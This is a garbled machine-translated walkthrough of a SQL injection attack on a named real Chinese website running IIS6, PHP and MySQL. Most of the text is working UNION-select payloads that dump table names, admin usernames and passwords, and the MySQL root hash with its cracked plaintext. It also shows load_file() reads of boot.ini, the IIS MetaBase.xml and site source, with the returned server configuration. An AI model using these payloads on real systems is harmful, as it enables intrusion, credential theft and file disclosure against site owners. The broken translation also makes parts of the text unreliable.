Php_mysql injection load_file () IIS configuration file acquisition

Let's first look at an injection point: http://www . Cn/news_detail.php? Newsid =-1 + union + select + 1, 2, 3, 4, 5, 6, concat (database (), 0x5c, user (), 0x5c, version (), 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 23, 24, 25, 26, 27 get Echo: flier_dbase \ root @ localhost \ 5.0.22-community-nt if the injection point is the first vulnerability, the root is the second website vulnerability table created by the Administrator: http://www . Cn/news_detail.php? Newsid = 1 + union + select + 1, 2, 3, 4, 5, 6, GROUP_CONCAT (DISTINCT + table_name), 8, 9, 10, 11, 12, 13, 16, 17, 18, 19, 20, 21, 24, 25, 26, 27 + from + information_schema.columns + where + table_schema = metadata to obtain data: pub_config, pub_tree, pub_webmaster, web_img, web_keys, web_ly, web_news, web_news_review‍Pub_webmaster field:‍ http://www . Cn/news_detail.php? Newsid =-1 + union + select +, GROUP_CONCAT (DISTINCT + column_name), 24, 25, 26, 27 + from + information_schema.columns + where + table_name = bytes get the following data: webmasterid, username, userpwd, loginnum, ip, lasttime, tree, name, dtime, sex, and jobs: http://www . Cn/news_detail.php? Newsid =-1 + union + select + 1, 2, 3, 4, 5, 6, GROUP_CONCAT (DISTINCT + username, 0x5f, userpwd, 22, 23, 24, 25, 26, 27 + from + pub_webmaster. The following is the third vulnerability. Since admin cannot find the background address, the password of the MySql administrator is cracked. http://www . Cn/news_detail.php? Newsid =-1 + union + select + 1, 2, 3, 4, 5, 6, concat (user, password), 8, 9, 10, 11, 12, 13, 16, 17, 18, 19, 20, 21, 24, 25, 26, 27 + from + mysql. user get data: root * CB26B0546CADD30FC2432C095A6A3D54FA3C2FFD database is an account. If the database cannot be unopened, wouldn't you give up? That's no better than. First, we undo it. The school's distributed password cracking system is hard to say about the eight-character, number, and symbol-based password. However, this password is a weak password with eight letters and symbols. It is not a loophole for the time being. * CB26B0546CADD30FC2432C095A6A3D54FA3C2FFD corresponds to qweasd in plain text.) @ 2. There are other ways to access a path. The IIS6 404 webpage indicates that the website server is: in the Windows + IIS6 + php + MySql environment, set c: \ boot first. the ini path is hex encoded to get: 0x633A5C5C626F6F742E696E69 and then, http://www . Cn/news_detail.php? Newsid =-1 + union + select + 1, 2, 3, 4, 5, 6, load_file (values), 8, 9, 10, 11, 12, 13, 16, 17, 18, 19, 20, 21, 24, 25, 26, 27 check ECHO: [boot loader] timeout = 30 default = multi (0) disk (0) rdisk (0) partition (1) \ WINDOWS [operating systems] multi (0) disk (0) rdisk (0) partition (1) \ WINDOWS = "Windows Server 2003, Enterprise"/fastdetect/NoExecute = OptOut although load_file can load files, it seems useless. If it is IIS6, load the path c: \ windows \ system32 \ inetsrv \ MetaBase. xml to obtain the website configuration information. * Note: For Windows file operations, the path must be a double slash. If it is a single slash, it will fail to be load_file. The reason may be that the slash is like this \ top left and bottom right, in Linux, it is in the upper-right and lower-left corner. If t is followed by the path slash (\ t) in Windows, let's see what it is in programming? What if \ n? What about? Yes, the path slash is gone. If it is a double slash, \ is the actual single slash. If you need to output a double slash, you need to use four slashes to express it. Is it depressing? \\\\ The last injection sentence is: http://www .Fly-er.com.cn/news_detail.php? Newsid =-1 + union + select + 1, 2, 3, 4, 5, 6, load_file (values), 8, 9, 10, 11, 12, 13, 16, 17, 18, 19, 20, 21, 24, 25, the ECHO is as follows:

<IIsWebServer        Location ="/LM/W3SVC/2125961364"                AuthFlags="0"                LogExtFileFlags="LogExtFileDate | LogExtFileTime | LogExtFileClientIp | LogExtFileUriStem | LogExtFileUriQuery | LogExtFileHttpStatus | LogExtFileWin32Status | LogExtFileServerPort | LogExtFileUserAgent | LogExtFileHttpSubStatus"                LogFileDirectory="E:\flylog"                LogFileLocaltimeRollover="FALSE"                LogFilePeriod="1"                LogFileTruncateSize="20971520"                LogPluginClsid="{FF160663-DE82-11CF-BC0A-00AA006111E0}"                ServerAutoStart="TRUE"                ServerBindings=":80:fly-er.com.cn                        :80:www.fly-er.com.cn"                ServerComment="fly-er.com.cn"        ></IIsWebServer>

 

Also:

<IIsWebVirtualDir Location = "/LM/W3SVC/2125961364/root" AccessFlags = "AccessRead | AccessWrite | AccessScript" AppFriendlyName = "Default Application" AppIsolated = "2" AppRoot = "/LM /W3SVC/2125961364/Root "AuthFlags =" AuthAnonymous | AuthNTLM "DefaultDoc =" login "Login =" DirBrowseShowDate | DirBrowseShowTime | login | EnableDefaultDoc "Path =" F: \ web \ 2010716 \ new_flyer "UNCPassword =" Courier "> </IIsWebVirtualDir>

 

Here we construct: http: // www.. cn/news_detail.php? Newsid =-1 + union + select + 1, 2, 3, 4, 5, 6, load_file (values), 8, 9, 10, 11, 12, 13, 16, 17, 18, 19, 20, 21, 24, 25, 26, 27 right-click to view the source code. * Note: When load_file is used, it is best to add a hex outside: hex (load_file (xxxxxxx) because I have met a website, the home page does not know where the code is wrong. The injection point is on the home page. I used the homepage load_file homepage file. If there is no hex nested outside, the homepage will be displayed cyclically. It is like this: The index contains an iframe, And the iframe loads the index file, the iframe in the index file loads the index file again and repeats until the machine resources are exhausted. Although I do not know whether the website was the iframe at that time, such nesting does have an endless loop. Therefore, we recommend that you use the hex nested load_file code in the index:

require('admin_flier/common/function.php');require('admin_flier/lib/class/form.class.php');require('admin_flier/lib/class/db.class.php');require('admin_flier/lib/class/page.class.php');include('inc/head.php'); 

 

Isn't it the background address? Obviously, the background is not secure enough. Even if the background address is hidden and the tool cannot be scanned, does it mean that the background security can be relaxed?